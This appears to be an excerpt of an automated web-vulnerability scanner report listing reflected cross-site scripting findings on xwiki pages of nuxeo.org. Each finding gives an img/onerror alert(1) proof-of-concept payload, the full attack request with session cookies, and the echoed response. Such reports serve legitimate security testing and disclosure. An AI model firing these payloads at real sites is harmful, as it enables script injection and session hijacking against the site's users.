GET /xwiki/bin/view/XWiki90042<img%20src%3da%20onerror%3dalert(1)>f4f08861abe/JaneZupan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:08 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12910
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/XWiki90042%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef4f08861abe/">XWiki90042<img src=a onerror=alert(1)>f4f08861abe</a>
...[SNIP]...

1.137. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/JaneZupan

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload febcb"><img%20src%3da%20onerror%3dalert(1)>50bdafe04d3 was submitted in the REST URL parameter 4. This input was echoed as febcb"><img src=a onerror=alert(1)>50bdafe04d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWikifebcb"><img%20src%3da%20onerror%3dalert(1)>50bdafe04d3/JaneZupan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:12 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12976
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWikifebcb%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E50bdafe04d3/JaneZupan?format=xar&amp;name=XWikifebcb"><img src=a onerror=alert(1)>50bdafe04d3.JaneZupan&amp;pages=XWikifebcb">
...[SNIP]...

1.138. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/JaneZupan

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 29e70<img%20src%3da%20onerror%3dalert(1)>3e0dea1fff1 was submitted in the REST URL parameter 5. This input was echoed as 29e70<img src=a onerror=alert(1)>3e0dea1fff1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/JaneZupan29e70<img%20src%3da%20onerror%3dalert(1)>3e0dea1fff1 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:39 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12898
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan29e70%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3e0dea1fff1'>JaneZupan29e70<img src=a onerror=alert(1)>3e0dea1fff1</a>
...[SNIP]...

1.139. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/JaneZupan

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2299e"><img%20src%3da%20onerror%3dalert(1)>dafd44348ed was submitted in the REST URL parameter 5. This input was echoed as 2299e"><img src=a onerror=alert(1)>dafd44348ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/JaneZupan2299e"><img%20src%3da%20onerror%3dalert(1)>dafd44348ed HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12960
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/JaneZupan2299e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Edafd44348ed?format=xar&amp;name=XWiki.JaneZupan2299e"><img src=a onerror=alert(1)>dafd44348ed&amp;pages=XWiki.JaneZupan2299e">
...[SNIP]...

1.140. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/LiseKemen

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f82cb<img%20src%3da%20onerror%3dalert(1)>e26b388e520 was submitted in the REST URL parameter 4. This input was echoed as f82cb<img src=a onerror=alert(1)>e26b388e520 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWikif82cb<img%20src%3da%20onerror%3dalert(1)>e26b388e520/LiseKemen HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:04 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12910
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/XWikif82cb%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee26b388e520/">XWikif82cb<img src=a onerror=alert(1)>e26b388e520</a>
...[SNIP]...

1.141. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/LiseKemen

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ad3d"><img%20src%3da%20onerror%3dalert(1)>d2452f8f639 was submitted in the REST URL parameter 4. This input was echoed as 5ad3d"><img src=a onerror=alert(1)>d2452f8f639 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki5ad3d"><img%20src%3da%20onerror%3dalert(1)>d2452f8f639/LiseKemen HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:19 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12976
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki5ad3d%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed2452f8f639/LiseKemen?format=xar&amp;name=XWiki5ad3d"><img src=a onerror=alert(1)>d2452f8f639.LiseKemen&amp;pages=XWiki5ad3d">
...[SNIP]...

1.142. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/LiseKemen

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f67e"><img%20src%3da%20onerror%3dalert(1)>480fe619997 was submitted in the REST URL parameter 5. This input was echoed as 2f67e"><img src=a onerror=alert(1)>480fe619997 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/LiseKemen2f67e"><img%20src%3da%20onerror%3dalert(1)>480fe619997 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12960
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/LiseKemen2f67e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E480fe619997?format=xar&amp;name=XWiki.LiseKemen2f67e"><img src=a onerror=alert(1)>480fe619997&amp;pages=XWiki.LiseKemen2f67e">
...[SNIP]...

1.143. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/LiseKemen

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7c5f<img%20src%3da%20onerror%3dalert(1)>e5413791935 was submitted in the REST URL parameter 5. This input was echoed as f7c5f<img src=a onerror=alert(1)>e5413791935 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/LiseKemenf7c5f<img%20src%3da%20onerror%3dalert(1)>e5413791935 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:37 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12898
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemenf7c5f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee5413791935'>LiseKemenf7c5f<img src=a onerror=alert(1)>e5413791935</a>
...[SNIP]...

1.144. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/skins/toucan

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2182"><img%20src%3da%20onerror%3dalert(1)>af9c268fe39 was submitted in the REST URL parameter 4. This input was echoed as a2182"><img src=a onerror=alert(1)>af9c268fe39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/skinsa2182"><img%20src%3da%20onerror%3dalert(1)>af9c268fe39/toucan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12937
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/skinsa2182%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eaf9c268fe39/toucan?format=xar&amp;name=skinsa2182"><img src=a onerror=alert(1)>af9c268fe39.toucan&amp;pages=skinsa2182">
...[SNIP]...

1.145. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/skins/toucan

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8e50<img%20src%3da%20onerror%3dalert(1)>a4e8dc4d729 was submitted in the REST URL parameter 4. This input was echoed as a8e50<img src=a onerror=alert(1)>a4e8dc4d729 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/skinsa8e50<img%20src%3da%20onerror%3dalert(1)>a4e8dc4d729/toucan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:55 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12871
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/skinsa8e50%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea4e8dc4d729/">skinsa8e50<img src=a onerror=alert(1)>a4e8dc4d729</a>
...[SNIP]...

1.146. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/skins/toucan

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c090"><img%20src%3da%20onerror%3dalert(1)>927538bfc55 was submitted in the REST URL parameter 5. This input was echoed as 6c090"><img src=a onerror=alert(1)>927538bfc55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/skins/toucan6c090"><img%20src%3da%20onerror%3dalert(1)>927538bfc55 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12921
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/skins/toucan6c090%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E927538bfc55?format=xar&amp;name=skins.toucan6c090"><img src=a onerror=alert(1)>927538bfc55&amp;pages=skins.toucan6c090">
...[SNIP]...

1.147. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/skins/toucan

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e9b27<img%20src%3da%20onerror%3dalert(1)>b14aaf13493 was submitted in the REST URL parameter 5. This input was echoed as e9b27<img src=a onerror=alert(1)>b14aaf13493 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/skins/toucane9b27<img%20src%3da%20onerror%3dalert(1)>b14aaf13493 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12859
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/skins/toucane9b27%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eb14aaf13493'>toucane9b27<img src=a onerror=alert(1)>b14aaf13493</a>
...[SNIP]...
